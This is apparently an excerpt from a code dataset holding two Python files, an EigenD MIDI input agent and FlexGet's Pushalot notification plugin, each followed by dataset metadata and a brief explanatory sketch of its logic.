# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EigenD. If not, see <http://www.gnu.org/licenses/>.
#
import os
import picross
import piw
from pi import atom,bundles,domain,agent,logic,utils,node,action,async,upgrade
from . import midi_input_version as version,midi_native
class VirtualKey(atom.Atom):
def __init__(self):
atom.Atom.__init__(self,names='key',protocols='virtual')
self.choices=[]
def __key(self,*keys):
x = ','.join(['cmp([dsc(~(parent)"#1","%(k)d")])' % dict(k=k) for k in keys])
return '[%s]' % x
def rpc_resolve(self,arg):
(a,o) = logic.parse_clause(arg)
print 'resolving virtual',arg,(a,o)
if not a and o is None: return self.__key(*range(0,128))
if a==('chosen',) and o is None: return self.__key(*self.choices)
if a or o is None: return self.__key()
o=int(o)
if o<0 or o>127: return self.__key()
return self.__key(o)
class VirtualCC(atom.Atom):
clist = (
('bank select coarse', 0), ('modulation wheel coarse', 1), ('breath controller coarse', 2), ('foot pedal coarse', 4),
('portamento time coarse', 5), ('data entry coarse', 6), ('volume coarse', 7), ('balance coarse', 8),
('pan position coarse', 10), ('expression coarse', 11), ('effect control 1 coarse', 12), ('effect control 2 coarse', 13),
('general purpose slider 1', 16), ('general purpose slider 2', 17), ('general purpose slider 3', 18), ('general purpose slider 4', 19),
('bank select fine', 32), ('modulation wheel fine', 33), ('breath controller fine', 34), ('foot pedal fine', 36),
('portamento time fine', 37), ('data entry fine', 38), ('volume fine', 39), ('balance fine', 40),
('pan position fine', 42), ('expression fine', 43), ('effect control 1 fine', 44), ('effect control 2 fine', 45),
('hold pedal', 64), ('portamento', 65), ('sustenuto pedal', 66), ('soft pedal', 67),
('legato pedal', 68), ('hold 2 pedal', 69), ('sound variation', 70), ('sound timbre', 71),
('sound release time', 72), ('sound attack time', 73), ('sound brightness', 74), ('sound control 6', 75),
('sound control 7', 76), ('sound control 8', 77), ('sound control 9', 78), ('sound control 10', 79),
('general purpose button 1', 80), ('general purpose button 2', 81), ('general purpose button 3', 82), ('general purpose button 4', 83),
('effects level', 91), ('tremulo level', 92), ('chorus level', 93), ('celeste level', 94),
('phaser level', 95), ('data button increment', 96), ('data button decrement', 97), ('non-registered parameter fine', 98),
('non-registered parameter coarse', 99), ('registered parameter fine', 100), ('registered parameter coarse', 101), ('all sound off', 120),
('all controllers off', 121), ('local keyboard', 122), ('all notes off', 123), ('omni mode off', 124),
('omni mode on', 125), ('mono operation', 126), ('poly operation', 127))
cdict = dict(clist)
def __init__(self):
atom.Atom.__init__(self,names='continuous controller',protocols='virtual browse')
self.__selected=None
def rpc_setselected(self,arg):
print 'VirtualCC:setselected',arg
def rpc_activated(self,arg):
print 'VirtualCC:activated',arg
return logic.render_term(('',''))
def rpc_current(self,arg):
return '[]'
def __key(self,*keys):
x = ','.join(['cmp([dsc(~(parent)"#2","%(k)d")])' % dict(k=k) for k in keys])
return '[%s]' % x
def rpc_resolve(self,arg):
(a,o) = logic.parse_clause(arg)
a = (' '.join(a)).lower()
print 'midi cc resolving',a,o
if a in self.cdict: return self.__key(self.cdict[a])
a2 = a+' coarse'
if a2 in self.cdict: return self.__key(self.cdict[a2])
if not a and o is None: return self.__key(*range(0,128))
if a or o is None: return self.__key()
o=int(o)
if o<0 or o>127: return self.__key()
print 'resolved to',self.__key(o)
return self.__key(o)
def rpc_enumerate(self,a):
return logic.render_term((len(self.clist),0))
def rpc_cinfo(self,a):
return '[]'
def rpc_finfo(self,a):
(path,idx) = logic.parse_clause(a)
map = tuple([ (str(s),'cc %d: %s' % (s,n),None) for (n,s) in self.clist[idx:] ])
return logic.render_term(map)
def rpc_fideal(self,arg):
try:
(path,cookie) = logic.parse_clause(arg)
cookie=int(cookie)
except:
utils.log_exception()
return async.failure('invalid cookie')
for name,val in self.clist:
if cookie==val:
return 'cmp([dsc(~(parent)"#2",%d)])' % val
return async.failure('invalid cookie')
class VirtualProgramChange(atom.Atom):
def __init__(self):
atom.Atom.__init__(self,names='program change',protocols='virtual')
self.choices=[]
def __key(self,*keys):
x = ','.join(['cmp([dsc(~(parent)"#8","%(k)d")])' % dict(k=k) for k in keys])
return '[%s]' % x
def rpc_resolve(self,arg):
(a,o) = logic.parse_clause(arg)
print 'resolving virtual',arg,(a,o)
if not a and o is None: return self.__key(*range(0,128))
if a==('chosen',) and o is None: return self.__key(*self.choices)
if a or o is None: return self.__key()
o=int(o)
if o<0 or o>127: return self.__key()
return self.__key(o)
class VirtualTrigger(atom.Atom):
def __init__(self):
atom.Atom.__init__(self,names='trigger',protocols='virtual')
self.choices=[]
def __key(self,*keys):
x = ','.join(['cmp([dsc(~(parent)"#10","%(k)d")])' % dict(k=k) for k in keys])
return '[%s]' % x
def rpc_resolve(self,arg):
(a,o) = logic.parse_clause(arg)
print 'resolving virtual',arg,(a,o)
if not a and o is None: return self.__key(*range(0,128))
if a==('chosen',) and o is None: return self.__key(*self.choices)
if a or o is None: return self.__key()
o=int(o)
if o<0 or o>127: return self.__key()
return self.__key(o)
class MidiDelegate(midi_native.midi_input):
def __init__(self,key_cookie,cc_cookie,pc_cookie,trig_cookie,midi_cookie,notify):
midi_native.midi_input.__init__(self,key_cookie,cc_cookie,pc_cookie,trig_cookie,midi_cookie)
self.sources = []
self.__notify = notify
def source_added(self,id,name):
xid = '%x'%id
for i,(u,n) in enumerate(self.sources):
if u==xid:
print 'midi source changed',xid,name
self.sources[i] = (xid,name)
self.__notify()
return
print 'midi source added',xid,name
self.sources.append((xid,name))
self.__notify()
def source_removed(self,id):
xid = '%x'%id
for i,(u,n) in enumerate(self.sources):
if u==xid:
print 'midi source removed',xid,n
del self.sources[i]
self.__notify()
return
class MidiPort(atom.Atom):
def __init__(self, key_cookie,cc_cookie,pc_cookie,trig_cookie,midi_cookie):
self.__timestamp = piw.tsd_time()
self.__midi = MidiDelegate(key_cookie,cc_cookie,pc_cookie,trig_cookie,midi_cookie,self.__sinks_changed)
atom.Atom.__init__(self,domain=domain.String(),names='midi port',policy=atom.default_policy(self.setport),protocols='virtual browse')
self.__midi.setport(0)
self.__midi.set_destination('')
self.__selected=None
self.__update()
self.__index = 1
def set_index(self,index):
self.__index = index
if self.open():
self.__midi.set_destination('Eigenlabs %d' % self.__index)
def server_opened(self):
atom.Atom.server_opened(self)
self.__midi.set_destination('Eigenlabs %d' % self.__index)
self.__midi.run()
self.setport(self.get_value())
def close_server(self):
atom.Atom.close_server(self)
self.__midi.set_destination('')
self.__midi.setport(0)
self.__midi.stop()
def __update(self):
if not self.get_value() and len(self.__midi.sources):
port = self.__midi.sources[0][0]
self.__midi.setport(int(port,16))
self.__timestamp = self.__timestamp+1
self.set_property_string('timestamp',str(self.__timestamp))
def setport(self,port):
self.set_value(port)
self.__update()
if self.open():
print 'set port to',port
if port:
self.__midi.setport(int(port,16))
else:
if len(self.__midi.sources):
self.__midi.setport(int(self.__midi.sources[0][0],16))
def __sinks_changed(self):
self.setport(self.get_value())
def rpc_displayname(self,arg):
return 'MIDI input ports'
def rpc_setselected(self,arg):
(path,selected)=logic.parse_clause(arg)
print 'MidiPort:setselected',selected
self.__selected=selected
def rpc_activated(self,arg):
(path,selected)=logic.parse_clause(arg)
print 'MidiPort:activated',selected
port=selected
self.setport(port)
return logic.render_term(('',''))
def clear_trim(self):
self.__midi.clear_trim()
def set_trim(self,cc,min,max,inv):
self.__midi.set_trim(cc,min,max,inv)
def current(self,cc):
return self.__midi.current(cc)
def resolve_name(self,name):
if name=='selection':
# o=self.__selected
return self.__ideal(self.__selected)
else:
try:
o = int(name)
except:
return '[]'
if o>0 and o<len(self.__midi.sources)+1:
return self.__ideal(self.__midi.sources[o-1][0])
return '[]'
def __ideal(self,uid):
return '[ideal([~server,midiport],%s)]' % logic.render_term(uid)
def rpc_fideal(self,arg):
(path,cookie) = logic.parse_clause(arg)
for id,n in self.__midi.sources:
if id==cookie:
return 'ideal([~server,midiport],%s)' % logic.render_term(cookie)
return async.failure('invalid cookie')
def rpc_current(self,arg):
current = self.__midi.getport()
if current==0:
return '[]'
return '[["%x",[]]]' % current
def rpc_resolve(self,arg):
(a,o) = logic.parse_clause(arg)
if a or not o:
return '[]'
return self.resolve_name(o)
def rpc_enumerate(self,a):
return logic.render_term((len(self.__midi.sources),0))
def rpc_cinfo(self,a):
return '[]'
def rpc_finfo(self,a):
(dlist,cnum) = logic.parse_clause(a)
map = tuple([(uid,dsc,None) for (uid,dsc) in self.__midi.sources[cnum:]])
return logic.render_term(map)
class Agent(agent.Agent):
def __init__(self, address, ordinal):
agent.Agent.__init__(self,names='midi input',signature=version,container=6,ordinal=ordinal)
self.domain = piw.clockdomain_ctl()
self.domain.set_source(piw.makestring('*',0))
self.set_private(node.Server(value=piw.makestring('[]',0), change=self.__settrim))
self[1] = bundles.Output(1,False,names='key output')
self[2] = bundles.Output(1,False,names='continuous controller output')
self[8] = bundles.Output(1,False,names='program change output')
self[10] = bundles.Output(1,False,names='trigger output')
self.key_output = bundles.Splitter(self.domain,self[1])
self.cc_output = bundles.Splitter(self.domain,self[2])
self.programchange_output = bundles.Splitter(self.domain,self[8])
self.trigger_output = bundles.Splitter(self.domain,self[10])
self[6] = bundles.Output(1,False,names='midi output')
self[7] = bundles.Output(2,False,names='midi clock output')
self.midi_output = bundles.Splitter(self.domain,self[6],self[7])
self[3] = VirtualKey()
self[4] = VirtualCC()
self[9] = VirtualProgramChange()
self[11] = VirtualTrigger()
self[5] = MidiPort(self.key_output.cookie(),self.cc_output.cookie(),self.programchange_output.cookie(),self.trigger_output.cookie(),self.midi_output.cookie())
self.add_verb2(2,'choose([],None,role(None,[ideal([~server,midiport]),singular]))',self.__chooseport)
self.add_verb2(3,'invert([],None,role(None,[cmpdsc(~(s)"#2")]))', self.__invert);
self.add_verb2(4,'minimise([],None,role(None,[cmpdsc(~(s)"#2")]),option(to,[numeric]))', self.__setmin);
self.add_verb2(5,'maximise([],None,role(None,[cmpdsc(~(s)"#2")]),option(to,[numeric]))', self.__setmax);
self.set_ordinal(ordinal)
def property_change(self,key,value,delegate):
if key == 'ordinal':
self[5].set_index(self.get_property_long('ordinal',1))
def __settrim(self,val):
if val.is_string():
trim = logic.parse_clause(val.as_string())
self[5].clear_trim()
for (cc,min,max,inv) in trim:
self[5].set_trim(cc,min,max,inv)
print 'trim:',trim
self.get_private().set_data(val)
def get_trim(self,cc):
trim = logic.parse_clause(self.get_private().get_data().as_string())
for (tcc,min,max,inv) in trim:
if tcc==cc:
return list((tcc,min,max,inv))
return [cc,0,127,False]
def set_trim(self,cc,min,max,inv):
trim = list(logic.parse_clause(self.get_private().get_data().as_string()))
done = False
for (i,(tcc,tmin,tmax,tinv)) in enumerate(trim):
if tcc==cc:
trim[i] = (cc,min,max,inv)
done = True
if not done:
trim.append((cc,min,max,inv))
self[5].set_trim(cc,min,max,inv)
trim = logic.render_term(tuple(trim))
self.get_private().set_data(piw.makestring(trim,0))
def __invert(self,subj,arg):
cc = int(arg[0].args[0][0].args[1])
print 'invert controller',cc
trim = self.get_trim(cc)
trim[3] = not trim[3]
self.set_trim(*trim)
def __setmin(self,subj,arg,val):
cc = int(arg[0].args[0][0].args[1])
if val is None:
val=self[5].current(cc)
else:
val=int(action.abstract_string(val))
print 'set controller minimum',cc,val
trim = self.get_trim(cc)
trim[1] = val
if trim[1]<=trim[2]:
trim[3]=False
else:
trim[3]=True
a=trim[1]
trim[1]=trim[2]
trim[2]=a
self.set_trim(*trim)
def __setmax(self,subj,arg,val):
cc = int(arg[0].args[0][0].args[1])
if val is None:
val=self[5].current(cc)
else:
val=int(action.abstract_string(val))
print 'set controller maximum',cc,val
trim = self.get_trim(cc)
trim[2] = val
if trim[1]<=trim[2]:
trim[3]=False
else:
trim[3]=True
a=trim[1]
trim[1]=trim[2]
trim[2]=a
self.set_trim(*trim)
def rpc_resolve_ideal(self,arg):
(type,arg) = action.unmarshal(arg)
print 'resolving',arg
if type=='midiport':
return self[5].resolve_name(' '.join(arg))
return action.marshal(())
def __chooseport(self,subj,arg):
print 'choose port',arg
print action.arg_objects(arg)[0]
(type,thing) = action.crack_ideal(action.arg_objects(arg)[0])
print type,thing
self[5].setport(thing)
agent.main(Agent,gui=True)
| gpl-3.0 | -6,468,693,866,637,945,000 | 35.474501 | 166 | 0.569726 | false |
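The __setmin/__setmax verbs in the MIDI input agent above keep each controller trim as a (cc, min, max, inverted) tuple with min <= max, flipping the inverted flag rather than storing a reversed range. Below is a standalone sketch of that normalisation; the function name is illustrative only and does not exist in the agent.

def normalise_trim(cc, first, second):
    """Return (cc, min, max, inverted) with min <= max, as the agent stores it."""
    if first <= second:
        return (cc, first, second, False)
    return (cc, second, first, True)

print(normalise_trim(74, 0, 127))    # (74, 0, 127, False) - normal range
print(normalise_trim(74, 127, 0))    # (74, 0, 127, True)  - same range, inverted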
patsissons/Flexget | flexget/plugins/output/pushalot.py | 4 | 6342 | from __future__ import unicode_literals, division, absolute_import
import logging
from flexget import plugin
from flexget.event import event
from flexget.utils import json
from flexget.utils.template import RenderError
from flexget.config_schema import one_or_more
log = logging.getLogger("pushalot")
pushalot_url = "https://pushalot.com/api/sendmessage"
class OutputPushalot(object):
"""
Example::
pushalot:
token: <string> Authorization token (can also be a list of tokens) - Required
title: <string> (default: task name -- accepts Jinja2)
body: <string> (default: "{{series_name}} {{series_id}}" -- accepts Jinja2)
link: <string> (default: "{{imdb_url}}" -- accepts Jinja2)
linktitle: <string> (default: (none) -- accepts Jinja2)
important: <boolean> (default is False)
        silent: <boolean> (default is False)
image: <string> (default: (none) -- accepts Jinja2)
source: <string> (default is "FlexGet")
timetolive: <integer> (no default sent, default is set by Pushalot)
Configuration parameters are also supported from entries (eg. through set).
"""
default_body = "{% if series_name is defined %}{{tvdb_series_name|d(series_name)}} " \
"{{series_id}} {{tvdb_ep_name|d('')}}{% elif imdb_name is defined %}{{imdb_name}} "\
"{{imdb_year}}{% else %}{{title}}{% endif %}"
schema = {
'type': 'object',
'properties': {
'token': one_or_more({'type': 'string'}),
'title': {'type': 'string', 'default': "Task {{task}}"},
'body': {'type': 'string', 'default': default_body},
'link': {'type': 'string', 'default': '{% if imdb_url is defined %}{{imdb_url}}{% endif %}'},
'linktitle': {'type': 'string', 'default': ''},
'important': {'type': 'boolean', 'default': False},
'silent': {'type': 'boolean', 'default': False},
'image': {'type': 'string', 'default': ''},
'source': {'type': 'string', 'default': 'FlexGet'},
'timetolive': {'type': 'integer', 'default': 0},
},
'required': ['token'],
'additionalProperties': False
}
# Run last to make sure other outputs are successful before sending notification
@plugin.priority(0)
def on_task_output(self, task, config):
# Support for multiple tokens
tokens = config["token"]
if not isinstance(tokens, list):
tokens = [tokens]
# Loop through the provided entries
for entry in task.accepted:
title = config["title"]
body = config["body"]
link = config["link"]
linktitle = config["linktitle"]
important = config["important"]
silent = config["silent"]
image = config["image"]
source = config["source"]
timetolive = config["timetolive"]
# Attempt to render the title field
try:
title = entry.render(title)
except RenderError as e:
log.warning("Problem rendering 'title': %s" % e)
title = "Download started"
# Attempt to render the body field
try:
body = entry.render(body)
except RenderError as e:
log.warning("Problem rendering 'body': %s" % e)
body = entry["title"]
# Attempt to render the link field
try:
link = entry.render(link)
except RenderError as e:
log.warning("Problem rendering 'link': %s" % e)
link = entry.get("imdb_url", "")
# Attempt to render the linktitle field
try:
linktitle = entry.render(linktitle)
except RenderError as e:
log.warning("Problem rendering 'linktitle': %s" % e)
linktitle = ""
try:
image = entry.render(image)
except RenderError as e:
log.warning("Problem rendering 'image': %s" % e)
image = ""
for token in tokens:
# Build the request
data = {"AuthorizationToken": token, "title": title, "body": body,
"link": link, "linktitle": linktitle, "important": important,
"silent": silent, "image": image, "source": source,
"timetolive": timetolive}
# Check for test mode
if task.options.test:
log.info("Test mode. Pushalot notification would be:")
log.info(" Title: %s" % title)
log.info(" body: %s" % body)
log.info(" link: %s" % link)
log.info(" link Title: %s" % linktitle)
log.info(" token: %s" % token)
log.info(" important: %s" % important)
log.info(" silent: %s" % silent)
log.info(" image: %s" % image)
log.info(" source: %s" % source)
log.info(" timetolive: %s" % timetolive)
# Test mode. Skip remainder.
continue
# Make the request
response = task.requests.post(pushalot_url, data=data, raise_status=False)
# Check if it succeeded
request_status = response.status_code
                # error codes and bodies from the Pushalot API
if request_status == 200:
log.debug("Pushalot notification sent")
elif request_status == 500:
log.debug("Pushalot notification failed, Pushalot API having issues")
# TODO: Implement retrying. API requests 5 seconds between retries.
elif request_status >= 400:
errors = json.loads(response.content)
log.error("Pushalot API error: %s" % errors['Description'])
else:
log.error("Unknown error when sending Pushalot notification")
@event('plugin.register')
def register_plugin():
plugin.register(OutputPushalot, "pushalot", api_ver=2)
| mit | 624,903,931,182,064,400 | 40.45098 | 105 | 0.52176 | false |
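The pushalot plugin above renders every notification field with Jinja2 and falls back to a per-field default when rendering fails. The minimal sketch below reproduces that render-or-fallback pattern outside FlexGet; it assumes jinja2 is installed, and the entry dict and field names are invented for illustration (they are not FlexGet's Entry class).

from jinja2 import StrictUndefined, Template

def render_or_default(template_str, context, default):
    """Render a Jinja2 template against a dict, returning a default on any error."""
    try:
        return Template(template_str, undefined=StrictUndefined).render(**context)
    except Exception:
        return default

entry = {"title": "Some.Show.S01E01.720p", "imdb_url": "http://www.imdb.com/title/tt0000000/"}
print(render_or_default("{{title}}", entry, "Download started"))
print(render_or_default("{{series_name}} {{series_id}}", entry, entry["title"]))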